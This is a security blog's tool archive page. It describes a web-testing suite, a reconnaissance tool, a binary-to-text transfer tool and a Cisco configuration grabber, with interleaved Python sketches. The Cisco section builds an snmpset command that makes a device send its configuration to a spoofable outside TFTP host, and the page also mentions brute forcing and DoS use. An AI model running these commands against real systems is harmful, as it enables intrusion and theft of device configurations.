Archive Tools

WebSurgery v1.0

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation.

It currently contains a spectrum of efficient, fast and stable tools, such as a Web Crawler with an embedded File/Dir Brute Forcer, a Fuzzer (for advanced exploitation of known and unusual vulnerabilities such as SQL injection and cross-site scripting (XSS)), a Brute Forcer (for login forms, identification of firewall-filtered rules and DoS attacks) and a Web Proxy (to analyze, intercept and manipulate the traffic between your browser and the target web application).


Web Crawler

Web Crawler is designed to be fast, accurate, stable and completely parameterized, using advanced techniques to extract links from JavaScript and HTML tags. It works with parameterized timing settings (Timeout, Threading, Max Data Size, Retries) and a number of rule parameters to prevent infinite loops and pointless scanning (Case Sensitive, Dir Depth, Process Above/Below, Submit Forms, Fetch Indexes/Sitemaps, Max Requests per File/Script Parameters).
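As a rough illustration of the kind of regex-based link extraction described above (this is a hypothetical sketch, not WebSurgery's actual code — the patterns and function names are mine):

```python
import re

# Hypothetical sketch: collect candidate links from HTML attributes
# and from quoted string literals inside JavaScript.
HTML_LINK = re.compile(r'(?:href|src|action)\s*=\s*["\']([^"\'<>\s]+)', re.I)
JS_LINK = re.compile(
    r'["\']((?:https?:)?//[^"\'<>\s]+|/[^"\'<>\s]*\.[a-z]{2,4})["\']', re.I)

def extract_links(body: str) -> set:
    """Return the set of link candidates found in a page body."""
    links = set(HTML_LINK.findall(body))
    links.update(JS_LINK.findall(body))
    return links

page = '<a href="/admin/login.php">x</a><script>var u = "/api/v1.json";</script>'
print(sorted(extract_links(page)))
```

A real crawler would additionally resolve relative paths against the page URL and apply the rule parameters (depth, filters) before queueing each link.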

It is also possible to apply custom headers (user agent, cookies etc.) and include/exclude filters. By default the crawler will scan only the initial web service (the URL at the specific port); however, you could change the initial filter “^($protocol)://($hostport)/” to a regular expression (.NET syntax) such as “^(http|https)://([^/]*\.)?test\.com” to cover a whole domain (e.g. http://test.com, https://test.com, http://www.test.com, https://something.test.com:9443 etc.).
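To see what that broadened scope filter does, here is a quick check of the pattern (written with an optional sub-domain group, “([^/]*\.)?”, so the bare domain matches too — note the blog's filter syntax is .NET, but the pattern behaves the same under Python's `re`):

```python
import re

# Include filter widened to a whole domain: http/https, any sub-domain
# (or none), any port, on test.com.
scope = re.compile(r'^(http|https)://([^/]*\.)?test\.com')

checks = {
    "http://test.com/": True,
    "https://something.test.com:9443/app": True,
    "http://www.test.com/index.html": True,
    "http://eviltest.com/": False,   # different domain, must not match
}
for url, expected in checks.items():
    assert bool(scope.match(url)) == expected
print("all scope checks passed")
```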

Web Crawler also includes an embedded File/Dir Brute Forcer which helps to directly brute force for files/dirs in the directories found from crawling.

Web Bruteforcer

Web Bruteforcer is a brute forcer for files and directories within the web application which helps to identify its hidden structure. Like the Web Crawler, it is multi-threaded and completely parameterized for timing settings (Timeout, Threading, Max Data Size, Retries) and rules (Headers, Base Dir, Brute Force Dirs/Files, Recursive, File Extensions, Send GET/HEAD, Follow Redirects, Process Cookies and List Generator configuration).

By default, it will brute force from the root / base dir recursively for both files and directories. It sends both HEAD and GET requests when needed (HEAD to identify whether the file/dir exists, then GET to retrieve the full response).
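The candidate generation behind such a brute forcer might look like the following sketch (base dirs, wordlist and extensions are example inputs; the function name is mine, not the tool's):

```python
from itertools import product

def candidates(base_dirs, words, extensions):
    """Build brute-force targets: each word tried as a directory and as
    a file with each extension, under every known directory."""
    paths = []
    for base, word in product(base_dirs, words):
        paths.append(f"{base}{word}/")              # directory guess
        for ext in extensions:
            paths.append(f"{base}{word}.{ext}")     # file guess
    return paths

first_round = candidates(["/"], ["admin", "backup"], ["php", "zip"])
print(first_round)
```

With the Recursive option, any directory that turns out to exist would be appended to `base_dirs` and the generation repeated for the next round.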

Web Fuzzer

Web Fuzzer is a highly advanced tool for creating a number of requests based on one initial request. The Fuzzer has no limits and can be used to exploit known vulnerabilities such as (blind) SQL injection, as well as in less common ways such as identifying improper input handling and firewall/filtering rules.

Web Editor

A Web Editor to send individual requests. It also contains a HEX editor for crafting more advanced requests.

Web Proxy

Web Proxy is a proxy server running locally that allows you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or any other application that supports proxies.


Download


root

March 17th

Tools

srgn-InfoGather

One of my old tools which helps with the initial steps of information gathering. Basically, it works with dig, whois and nmap scan results. Unfortunately, it’s not really user-friendly and not documented. I’ve already coded the basic structure of a new information-gathering tool, but it still needs a lot of work.

Features

For a domain:
- Find Domain’s Name servers (NS Records)
- Find Domain’s Mail servers (MX Records)
- Find sub-domains using Google Search
- Find sub-domains using Brute force
- Find possible Clusters / Balancers (different IP, same Host)
- Find related domains
- Whois Domain details
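The clusters/balancers check in the list above boils down to spotting hosts that resolve to more than one address. A minimal sketch of that logic (the hostnames and addresses are made-up examples):

```python
from collections import defaultdict

def find_clusters(resolutions):
    """Given (hostname, ip) pairs, report hosts that resolve to more
    than one address -- a hint of a cluster or load balancer."""
    ips = defaultdict(set)
    for host, ip in resolutions:
        ips[host].add(ip)
    return {h: sorted(a) for h, a in ips.items() if len(a) > 1}

seen = [
    ("www.test.com", "203.0.113.10"),
    ("www.test.com", "203.0.113.11"),   # same host, second IP
    ("mail.test.com", "203.0.113.20"),
]
print(find_clusters(seen))
```

In practice the `(host, ip)` pairs would come from repeated DNS lookups of the discovered sub-domains.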

For Name servers:
- Check Name Servers for Zone Transfers
- Check Name Servers for version.bind (Banner)

For Mail servers:
- Check Mail Servers for User Enumeration (VRFY / EXPN)
- Check Mail Servers for Open Relay

For IP Addresses:
- Find Host Names
- Find Virtual Hosts using Bing API 2.0
- Whois IP details (Gets ISP / LIR details as well)
- Find more IP Ranges based on Net Name
- Find more IP Ranges based on Maintainer (mnt-by)

For Ports (import Nmap xml file):
- Find Port banner
- Find Web (HTTP/HTTPS) Ports
- Find Same Web Sites running on different IP / Port
- Check Web Ports for OPTIONS, Server Banner, Internal IPs exposure
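Since the port checks start from an imported Nmap XML file, finding the web (HTTP/HTTPS) ports is essentially an XML walk. A self-contained sketch with an inline example report (the exact fields the tool reads are an assumption on my part):

```python
import xml.etree.ElementTree as ET

# Minimal Nmap-XML-like report used as example input.
NMAP_XML = """<nmaprun><host>
  <address addr="203.0.113.5" addrtype="ipv4"/>
  <ports>
    <port protocol="tcp" portid="80">
      <state state="open"/><service name="http"/>
    </port>
    <port protocol="tcp" portid="22">
      <state state="open"/><service name="ssh"/>
    </port>
    <port protocol="tcp" portid="8443">
      <state state="open"/><service name="https-alt"/>
    </port>
  </ports>
</host></nmaprun>"""

def web_ports(xml_text):
    """Return (address, port) pairs for open ports whose service name
    looks like HTTP/HTTPS."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            if state == "open" and "http" in name:
                found.append((addr, int(port.get("portid"))))
    return found

print(web_ports(NMAP_XML))
```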

Download


root

July 28th

Tools

srgn-file2text

It converts a binary file to text, making it possible to recreate the binary from that text on a server which has no internet access.
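The tool emits loaders for debug.exe, VBScript and JScript; the core idea, stripped of any particular loader format, is just a text-safe round trip. A language-agnostic sketch in Python (hex encoding here is my choice for illustration, not necessarily the tool's format):

```python
import binascii

def file_to_text(data: bytes, width: int = 32) -> str:
    """Encode a binary blob as plain hex lines that can be pasted
    through a terminal onto a host with no internet access."""
    hexed = binascii.hexlify(data).decode()
    return "\n".join(hexed[i:i + width] for i in range(0, len(hexed), width))

def text_to_file(text: str) -> bytes:
    """Rebuild the original bytes from the pasted hex lines."""
    return binascii.unhexlify("".join(text.split()))

blob = bytes(range(16)) * 4
assert text_to_file(file_to_text(blob)) == blob
print("round-trip ok")
```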

Supports (srgn-file2text-v2.1)

    • Windows Debugger (debug.exe)
    • VBScript
    • JScript

Download source
Download .exe

Related

Creating Binary Files on a Firewalled Server
Download Files using default windows commands


root

June 23rd

Tools

srgn-ciscoconf

It downloads a Cisco configuration file over the SNMP protocol using a TFTP server. IP spoofing is possible because SNMP passes the TFTP server’s IP address as a parameter. A brute forcer for [spoofed_ips] [community_strings] [cisco_targets] is also attached.
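The general shape of this classic attack is a single SNMP SET against the OLD-CISCO-SYS-MIB `writeNet` object, where the TFTP server’s IP is encoded in the OID itself — which is why the parameter can be spoofed. A sketch that only builds the net-snmp `snmpset` command line (addresses and community string are examples; nothing is executed here):

```python
def snmpset_cmd(target, community, tftp_ip, filename):
    """Build the snmpset invocation that asks a Cisco device to write
    its config to <tftp_ip> as <filename> (writeNet, OLD-CISCO-SYS-MIB).
    The TFTP server address is appended to the OID, not sent separately."""
    oid = f".1.3.6.1.4.1.9.2.1.55.{tftp_ip}"
    return ["snmpset", "-v1", "-c", community, target, oid, "s", filename]

cmd = snmpset_cmd("192.0.2.1", "private", "198.51.100.9", "running.cfg")
print(" ".join(cmd))
```

Running the printed command (with a writable community string and a listening TFTP server) is what the tool automates, and the attached brute forcer simply iterates the spoofed IPs, community strings and targets.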

Download srgn-ciscoconf-v1.0
Download Bruteforcer

Related

Security Focus – Download
SourceForge – Download
Cisco SNMP configuration attack with a GRE tunnel


root

June 23rd

Tools

© 2017 SuRGeoNix | Security Blog